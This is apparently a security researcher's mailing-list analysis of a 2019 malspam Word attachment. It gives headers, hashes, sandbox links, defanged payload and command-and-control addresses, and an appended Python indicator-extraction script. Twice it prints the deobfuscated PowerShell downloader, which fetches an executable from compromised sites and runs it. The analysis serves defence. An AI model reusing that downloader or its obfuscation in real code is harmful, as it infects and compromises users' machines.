*Just an FYI, the obfuscated URLs and IPs below are malicious.*

This is apparently (?) part of a wave of spoofed malspams impersonating messages with 'weaponized' attachments sent to the NANOG (North American Network Operators Group) mailing list.

Background: https://mailman.nanog.org/pipermail/nanog/2019-May/101140.html

Details:

Date: Wed, 29 May 2019 10:03:04 -0500
From: "NANOG" <Helene.Rouleau@paral.ca>
To: "Paul Ferguson" <fergdawgster@mykolab.com>
Subject: Mykolab Ref Id: I32560
X-Authenticated-Sender: s214.panelboxmanager.com
Return-Path: <Helene.Rouleau@paral.ca>

Attachment: "ATTACHMENT 654860 I32560.doc"
MD5: 49fbc31d5e46d83c4741d64a1c268e8d
SHA-1: 62b00133e2a78063b76a473a9c0b42a00b3042b8
SHA256: 8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5
File Type: MS Word Document
Magic: CDF V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: North Dakota, Subject: Maine, Author: Darrell Hammes, Comments: Tunisia policy, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue May 28 12:55:00 2019, Last Saved Time/Date: Tue May 28 12:55:00 2019, Number of Pages: 1, Number of Words: 15, Number of Characters: 90, Security: 0
SSDeep: 3072:t1b77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qSp8ALPmiuVvbIF/j9G5:Pb77HUUUUUUUUUUUUUUUUUUUT52VP61Z
TRiD:
  Microsoft Word document (54.2%)
  Microsoft Word document (old ver.) (32.2%)
  Generic OLE2 / Multistream Compound File (13.5%)
File Size: 136.38 KB

Analysis:

VT: https://www.virustotal.com/#/file/8c401ced381ce742105acae9b3d39d2f01681d4e3c...
HA: https://www.hybrid-analysis.com/sample/8c401ced381ce742105acae9b3d39d2f01681...
Joe Sandbox: https://www.joesandbox.com/analysis/136644/0/executive
app.any.run: https://app.any.run/tasks/18d747ef-42d6-40e8-b496-6eb54c5f5dac

Embedded Powershell script does:

WINWORD.EXE /n "C:\ATTACHMENT654860I32560.doc" (PID: 3256)
powershell.exe powershell -nop -e [base64 blob omitted] (PID: 2624, Additional Context: $ClIEYk2='aJNMKF3l';$RwYKCvO = '936';$QBVad9='L8HDzN';$wXpbVp=$env:userprofile+'\'+$RwYKCvO+'.exe';$GAizz7='DOIoST';$Tb9Eu2Ir=.('new-'+'obj'+'ect') Net`.WeBC`L`IENt;$kuW_o7S5='http://ceo.calcus[.]com/postnewo/RwhvOlZIs/@http://lastminutelollipop[.]com/wp-admin/aEQlppdlfo/@http://kashmirhackers[.]com/wp-admin/wQXhortSfJ/@http://omegaconsultoriacontabil[.]com.br/site/wAKkbOEwy/@http://nottspcrepair[.]co.uk/nye/hKZlDvPfy/'.SPLiT('@');$o7VBQtlb='O1YGb0p';foreach($z3Rv3jv in $kuW_o7S5){try{$Tb9Eu2Ir.DowNLOadFILE($z3Rv3jv, $wXpbVp);$iYpOYcLV='X06jSR24';If ((&('Get-'+'Ite'+'m') $wXpbVp).lEngTH -ge 29780) {[Diagnostics.Process]::START($wXpbVp);$VHTOouw='I_Wk2bHr';break;$EXXmBmX='rkFKCT'}}catch{}}$SAutaY='YnVq3JJ')
936.exe (PID: 2888) 24/72
936.exe --26d066e0 (PID: 2932) 24/72
enablerouting.exe (PID: 272)

'Payload quintet' from script above (compromised pages):

http://ceo.calcus[.]com/postnewo/RwhvOlZIs/
http://lastminutelollipop[.]com/wp-admin/aEQlppdlfo/
http://kashmirhackers[.]com/wp-admin/wQXhortSfJ/
http://omegaconsultoriacontabil[.]com.br/site/wAKkbOEwy/
http://nottspcrepair[.]co.uk/nye/hKZlDvPfy/

Observed network activity:

GET ceo.calcus[.]com/postnewo/RwhvOlZIs/
GET lastminutelollipop[.]com/wp-admin/aEQlppdlfo/
POST 31.12.67[.]62:7080/acquire/tlb/ringin/

Non-authoritative answer:
Name: ceo.calcus[.]com
Address: 68.183.65[.]234

Non-authoritative answer:
Name: lastminutelollipop[.]com
Address: 158.69.127[.]22

Non-authoritative answer:
Name: kashmirhackers[.]com
Address: 173.249.2[.]31

Non-authoritative answer:
Name: omegaconsultoriacontabil[.]com.br
Address: 74.63.242[.]18

Non-authoritative answer:
Name: nottspcrepair[.]co.uk
Address: 185.38.44[.]163

AS    | IP              | AS Name
14061 | 68.183.65[.]234 | DIGITALOCEAN-ASN - DigitalOcean, LLC, US (shared hosting)
16276 | 158.69.127[.]22 | OVH, FR (shared hosting)
51167 | 173.249.2[.]31  | CONTABO, DE (shared hosting)
46475 | 74.63.242[.]18  | LIMESTONENETWORKS - Limestone Networks, Inc., US (shared hosting)
33182 | 185.38.44[.]163 | DIMENOC - HostDime.com, Inc., US (shared hosting)
44099 | 31.12.67[.]62   | RUNISO-AS RUNISO Autonomous System, FR (appears to be stand-alone IP, no PTR record)

FYI,

- ferg

—
Paul Ferguson
Principal, Threat Intelligence
Gigamon
Seattle, Washington, USA
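The 'payload quintet', the dropped file name and the size threshold above were pulled from the decoded PowerShell by hand; the following added example (not part of the post) does the same extraction programmatically, so the indicators can be fed to a blocklist or log search. It operates on a copy of the defanged script text quoted above and never decodes, fetches or runs anything.

```python
import re

# Constructed copy of the deobfuscated downloader quoted in the post above;
# domains keep the post's "[.]" defanging, so nothing here resolves or connects.
DOWNLOADER = r"""$ClIEYk2='aJNMKF3l';$RwYKCvO = '936';$QBVad9='L8HDzN';$wXpbVp=$env:userprofile+'\'+$RwYKCvO+'.exe';$GAizz7='DOIoST';$Tb9Eu2Ir=.('new-'+'obj'+'ect') Net`.WeBC`L`IENt;$kuW_o7S5='http://ceo.calcus[.]com/postnewo/RwhvOlZIs/@http://lastminutelollipop[.]com/wp-admin/aEQlppdlfo/@http://kashmirhackers[.]com/wp-admin/wQXhortSfJ/@http://omegaconsultoriacontabil[.]com.br/site/wAKkbOEwy/@http://nottspcrepair[.]co.uk/nye/hKZlDvPfy/'.SPLiT('@');$o7VBQtlb='O1YGb0p';foreach($z3Rv3jv in $kuW_o7S5){try{$Tb9Eu2Ir.DowNLOadFILE($z3Rv3jv, $wXpbVp);$iYpOYcLV='X06jSR24';If ((&('Get-'+'Ite'+'m') $wXpbVp).lEngTH -ge 29780) {[Diagnostics.Process]::START($wXpbVp);$VHTOouw='I_Wk2bHr';break;$EXXmBmX='rkFKCT'}}catch{}}$SAutaY='YnVq3JJ'"""

def extract_urls(script):
    # The loader keeps its candidate hosts in one '@'-joined quoted string.
    # PowerShell is case-insensitive (SPLiT, DowNLOadFILE), hence re.I.
    m = re.search(r"'([^']+)'\.split\('@'\)", script, re.I)
    return m.group(1).split("@") if m else []

def extract_hosts(urls):
    # Hostnames only (still defanged), for blocklists or DNS/proxy log matching.
    return [re.match(r"https?://([^/]+)", u).group(1) for u in urls]

def extract_min_size(script):
    # Byte threshold the loader demands before executing the download; a small
    # error page fails it and the loop tries the next URL (hence five hosts).
    m = re.search(r"\.length\s+-ge\s+(\d+)", script, re.I)
    return int(m.group(1)) if m else 0

def extract_drop_name(script):
    # Resolve $env:userprofile + '\' + $VAR + '.exe' to the dropped file name
    # by looking up the earlier assignment to $VAR.
    m = re.search(r"\$env:userprofile\+'\\'\+\$(\w+)\+'(\.\w+)'", script, re.I)
    if not m:
        return ""
    v = re.search(r"\$" + re.escape(m.group(1)) + r"\s*=\s*'([^']*)'", script)
    return v.group(1) + m.group(2) if v else ""

def summarize(script):
    # The indicators a responder pulls from this downloader in one pass.
    urls = extract_urls(script)
    return {"urls": urls, "hosts": extract_hosts(urls),
            "min_size": extract_min_size(script),
            "drop_name": extract_drop_name(script)}
```

Matching the `-ge` size check against the file size of whatever a sandbox actually fetched tells you whether a given host was still serving the payload at detonation time.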